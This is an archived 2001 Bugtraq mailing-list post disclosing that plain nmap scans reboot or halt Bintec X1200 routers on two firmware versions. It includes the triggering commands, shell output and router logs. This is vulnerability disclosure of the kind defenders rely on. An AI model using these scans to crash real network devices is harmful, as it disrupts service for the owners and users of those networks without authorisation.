[20142] in bugtraq
BINTEC X1200
daemon@ATHENA.MIT.EDU (Johnny Cyberpunk)
Wed Apr 11 02:25:07 2001
Message-ID: <001301c0c121$c2ad6940$2100a8c0@illegalaccess.de>
Date: Mon, 9 Apr 2001 20:20:30 +0200
Reply-To: Johnny Cyberpunk <johncybpk@GMX.NET>
From: Johnny Cyberpunk <johncybpk@GMX.NET>
To: BUGTRAQ@SECURITYFOCUS.COM
Kai,
Sorry for the little information I gave in the last post. Here is the
detailed info.
I've tested these exploits again on two different BIOS versions some
minutes ago.
These BIOS are available for download at www.bintec.de for the Bintec X1200
Router.
First Version V5.1 Rev 6
nmap <ip> -sU -p '53-53'
This causes the router to reboot.
It seems that the router is vulnerable to a normal port 53 UDP scan.
-------------------------------------------------------------------------
Second Version V5.3 Rev 1
nmap <ip>
Halts the system, and a power-off is necessary.
Here is the output:
----------------------
[root@xxxxx /root]# nmap 192.168.0.1
Starting nmap V. 2.54BETA7 ( www.insecure.org/nmap/ ) # starting nmap against bintec x1200
caught SIGINT signal, cleaning up # after about 3 sec
[root@xxxxx /root]# ping c0r3 # trying to ping bintec x1200...
PING 192.168.0.1 from 192.168.0.22 : 56(84) bytes of data. # no response...
--- 192.168.0.1 ping statistics ---
7 packets transmitted, 0 packets received, 100% packet loss
[root@xxxxx /root]#55 192.168.0.1 INET: dialup if 10001 prot 17
192.168.0.21:1034->205.188.153.102:4000
Apr 9 19:17:48 192.168.0.1 ACCT: INET: 09.04.2001 19:19:27 2 6
192.168.0.22:2100/1000 -> 62.112.136.241:80/10001 24 3585 36 44513
Apr 9 19:17:48 192.168.0.1 ACCT: INET: 09.04.2001 19:19:27 0 17
217.80.196.15:1025/0 -> 212.185.248.116:53/10001 1 63 1 173
Apr 9 19:17:48 192.168.0.1 ACCT: INET: 09.04.2001 18:57:37 1309 6
192.168.0.22:2092/1000 -> 62.112.136.241:80/10001 24 12334 24 5727
Apr 9 19:18:10 192.168.0.1 ACCT: INET: 09.04.2001 19:19:47 0 17
192.168.0.21:1034/1000 -> 205.188.153.102:4000/10001 2 76 1 38
Apr 9 19:18:32 192.168.0.1 ACCT: INET: 09.04.2001 19:20:11 0 6
192.168.0.22:2101/1000 -> 62.112.136.241:80/10001 6 800 6 2170
Apr 9 19:18:32 192.168.0.1 ACCT: INET: 09.04.2001 18:57:37 1354 6
192.168.0.22:2093/1000 -> 62.112.136.241:80/10001 23 10464 24 5554
Apr 9 19:18:54 192.168.0.1 ACCT: INET: 09.04.2001 19:20:26 1 6
192.168.0.22:2102/1000 -> 62.112.136.241:80/10001 30 2139 48 63801
Apr 9 19:18:54 192.168.0.1 ACCT: INET: 09.04.2001 18:57:37 1369 6
192.168.0.22:2094/1000 -> 62.112.136.241:80/10001 23 10570 23 5498
Apr 9 19:18:54 192.168.0.1 ACCT: INET: 09.04.2001 18:57:37 1370 6
192.168.0.22:2095/1000 -> 62.112.136.241:80/10001 22 9835 22 5181
Apr 9 19:19:05 192.168.0.1 ACCT: INET: 09.04.2001 19:20:27 11 6
192.168.0.22:2103/1000 -> 62.112.136.241:80/10001 7 1479 7 1452
Apr 9 19:19:05 192.168.0.1 ACCT: INET: 09.04.2001 19:20:38 1 6
192.168.0.22:2104/1000 -> 62.112.136.241:80/10001 12 1285 13 13119
Apr 9 19:19:05 192.168.0.1 ACCT: INET: 09.04.2001 19:20:43 1 6
192.168.0.22:2105/1000 -> 62.112.136.241:80/10001 21 1860 32 40868
Apr 9 19:19:16 192.168.0.1 ACCT: INET: 09.04.2001 19:20:48 0 17
192.168.0.21:1034/1000 -> 205.188.153.102:4000/10001 2 76 1 38
Apr 9 19:19:38 192.168.0.1 ACCT: INET: 09.04.2001 19:21:15 3 6
192.168.0.21:1043/1000 -> 64.4.13.235:1863/10001 9 449 7 381
Apr 9 19:20:53 192.168.0.1 ETHER: slot 1: Auto-negotiation done
(100BaseTx/halfdup)1 # after reboot